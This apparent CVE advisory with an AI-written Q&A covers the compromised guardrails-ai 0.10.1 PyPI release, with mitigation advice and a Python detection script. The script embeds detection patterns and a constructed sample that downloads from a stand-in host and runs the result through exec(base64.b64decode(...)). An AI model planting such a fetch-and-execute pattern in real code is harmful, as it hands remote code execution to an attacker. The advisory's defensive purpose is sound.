CVE-2026-45758
Malicious Package in Guardrails AI Framework
Publication date: 2026-06-05
Last updated on: 2026-06-05
Assigner: GitHub, Inc.
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| guardrails_ai | guardrails-ai | From 0.10.0 (exc) to 0.10.2 (exc) |
| guardrails-ai | guardrails-ai | From 0.10.0 (exc) to 0.10.2 (exc) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-506 | The product contains code that appears to be malicious in nature. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-45758 is a supply chain compromise involving the Python package guardrails-ai version 0.10.1. On May 11, 2026, an attacker published a malicious version of this package to PyPI, which contained embedded malicious code that could download and execute remote payloads when the package was imported.
The attack originated from a compromised GitHub Personal Access Token (PAT) of an employee, which was used to trigger GitHub Actions across multiple repositories to extract deploy tokens and publish the malicious package. The malicious code was injected into the guardrails/__init__.py file.
The malicious package was identified and quarantined by PyPI within approximately two hours, and no evidence of data exfiltration or malicious activity was found in system logs or requests to Guardrails AI infrastructure.
Users who installed version 0.10.1 are advised to uninstall it, rotate all credentials accessible from their machines (such as GitHub PATs, cloud keys, API tokens), audit their GitHub accounts for unauthorized workflows or repositories, and consider a full machine reimage if sensitive credentials were handled.
Safe versions are 0.10.0 and 0.10.2, and users should pin to these versions or install directly from GitHub.
How can this vulnerability impact me?
This vulnerability can compromise your local environment if you installed the malicious guardrails-ai version 0.10.1. The malicious code can execute remote payloads, potentially allowing attackers to access sensitive credentials stored on your machine.
If compromised, attackers could gain unauthorized access to your GitHub account, cloud provider keys, package registry tokens, and API keys, leading to further security breaches.
The vulnerability has a critical severity score of 9.6, indicating high impact on confidentiality, integrity, and availability of your systems and data.
Users are advised to rotate all credentials accessible from the affected machine and audit their accounts to mitigate potential impacts.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection involves identifying whether the malicious version 0.10.1 of guardrails-ai is installed on your system, as it contains injected code in the guardrails/__init__.py file that downloads and executes a remote payload on import.
You can check the installed version of guardrails-ai with the following command:
- pip show guardrails-ai
Alternatively, to list all installed packages and their versions:
- pip list | grep guardrails-ai
To inspect the specific file for malicious code, you can check the contents of guardrails/__init__.py in the installed package directory for suspicious code that downloads and executes remote payloads.
Additionally, auditing network traffic for unexpected outbound connections to unknown URLs or IPs triggered by Python processes importing guardrails-ai may help detect malicious activity.
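As an added example (not code from this advisory or from the Guardrails AI project), the following Python script automates the checks described above: it reads the installed guardrails-ai version from package metadata without importing the package, classifies it against the versions named in this record, and scans the text of guardrails/__init__.py for the download-and-execute shape that the description attributes to the injected code. The regex indicator lists and the two embedded sample files are constructed for illustration; the actual injected code is not reproduced on this page, so a hit is a prompt for manual review rather than a verdict, and a legitimate module that fetches data and also spawns processes will trigger the same heuristic.

```python
"""Check for the quarantined guardrails-ai 0.10.1 and scan __init__.py for
download-and-execute indicators. Added example, not the project's own code."""
import importlib.util
import re
from importlib import metadata

# Versions named in this record: 0.10.1 was the malicious upload,
# 0.10.0 and 0.10.2 are the versions the advisory calls safe.
MALICIOUS_VERSIONS = {"0.10.1"}
SAFE_VERSIONS = {"0.10.0", "0.10.2"}

# Constructed indicator lists (assumptions, not taken from the real payload).
FETCH_PATTERNS = [
    r"\burllib\.request\.urlopen\s*\(",
    r"\brequests\.(get|post)\s*\(",
    r"\bhttp\.client\.HTTP(S)?Connection\s*\(",
    r"\bsocket\.create_connection\s*\(",
]
EXEC_PATTERNS = [
    r"\bexec\s*\(",
    r"\beval\s*\(",
    r"\bsubprocess\.(run|Popen|call|check_output)\s*\(",
    r"\bos\.(system|popen)\s*\(",
]
OBFUSCATION_PATTERNS = [
    r"\bbase64\.b64decode\s*\(",
    r"\bmarshal\.loads\s*\(",
    r"\bzlib\.decompress\s*\(",
]


def installed_version(dist="guardrails-ai"):
    """Return the installed version string, or None if the package is absent.
    Reads dist-info metadata only; the package is never imported."""
    try:
        return metadata.version(dist)
    except metadata.PackageNotFoundError:
        return None


def classify_version(version):
    """Map a version string to one of: not-installed, malicious, safe, unknown."""
    if version is None:
        return "not-installed"
    if version in MALICIOUS_VERSIONS:
        return "malicious"
    if version in SAFE_VERSIONS:
        return "safe"
    return "unknown"


def scan_source(source):
    """Scan Python source text for fetch / exec / obfuscation indicators.
    Returns (line, matched text) pairs per category plus a combined flag that
    is set only when both a network fetch and a code-execution call appear."""
    def hits(patterns):
        found = []
        for pat in patterns:
            for m in re.finditer(pat, source):
                line = source.count("\n", 0, m.start()) + 1
                found.append((line, m.group(0)))
        return sorted(found)
    fetch = hits(FETCH_PATTERNS)
    execs = hits(EXEC_PATTERNS)
    obf = hits(OBFUSCATION_PATTERNS)
    return {"fetch": fetch, "exec": execs, "obfuscation": obf,
            "suspicious": bool(fetch and execs)}


def scan_installed_init(package="guardrails"):
    """Locate <package>/__init__.py via the import system without executing
    it and scan its text. Returns None when the package cannot be found."""
    spec = importlib.util.find_spec(package)  # top-level lookup does not import
    if spec is None or not spec.origin or not spec.origin.endswith("__init__.py"):
        return None
    with open(spec.origin, encoding="utf-8", errors="replace") as fh:
        return scan_source(fh.read())


# Constructed sample module texts used to exercise the scanner offline.
SAMPLE_SUSPECT_INIT = '''\
"""guardrails package (constructed sample, not the real file)"""
import base64, urllib.request
_blob = urllib.request.urlopen("https://example.invalid/p").read()
exec(base64.b64decode(_blob))
'''
SAMPLE_CLEAN_INIT = '''\
"""guardrails package (constructed sample, not the real file)"""
from guardrails.guard import Guard
__all__ = ["Guard"]
'''

if __name__ == "__main__":
    ver = installed_version()
    print(f"guardrails-ai version: {ver} -> {classify_version(ver)}")
    print("installed __init__.py scan:", scan_installed_init())
    print("constructed suspect sample:", scan_source(SAMPLE_SUSPECT_INIT))
    print("constructed clean sample:", scan_source(SAMPLE_CLEAN_INIT))
```

Run it on the machine you want to check; a "malicious" classification or a scan with `suspicious` set should be followed by the uninstall, credential rotation and audit steps in the next section. The scanner reads file text only and never imports the package, so it is safe to run against a suspect installation.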
What immediate steps should I take to mitigate this vulnerability?
If you have installed guardrails-ai version 0.10.1, immediately uninstall this version and upgrade to the safe version 0.10.2 or downgrade to 0.10.0.
- Uninstall the malicious package: pip uninstall guardrails-ai
- Install a safe version: pip install guardrails-ai==0.10.0
Rotate all credentials accessible from the affected machine, including GitHub Personal Access Tokens (PATs), cloud provider keys, package registry tokens, and API keys.
Audit your GitHub account for unauthorized workflows or repositories.
Consider a full machine reimage if sensitive credentials were handled on the compromised system.
Snowglobe and Guardrails Hub users should rotate their API keys before May 13, 2026, at 2:00 PM Pacific to avoid service interruption.
Review GitHub Actions configurations and PAT policies to prevent similar supply chain attacks.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The vulnerability involves a malicious package published to PyPI that could compromise local environments and expose credentials. Although no evidence of user data exfiltration was found, users who installed the affected version are advised to rotate credentials and audit accounts to prevent unauthorized access.
Because the incident involves a supply chain attack and potential credential compromise, organizations using the affected package may face increased risk of unauthorized access to sensitive data, which could impact compliance with standards like GDPR and HIPAA that require protection of personal and sensitive information.
No direct evidence of data breach or exfiltration was reported, which may mitigate immediate compliance violations, but the need for credential rotation and auditing indicates a risk that must be managed to maintain compliance.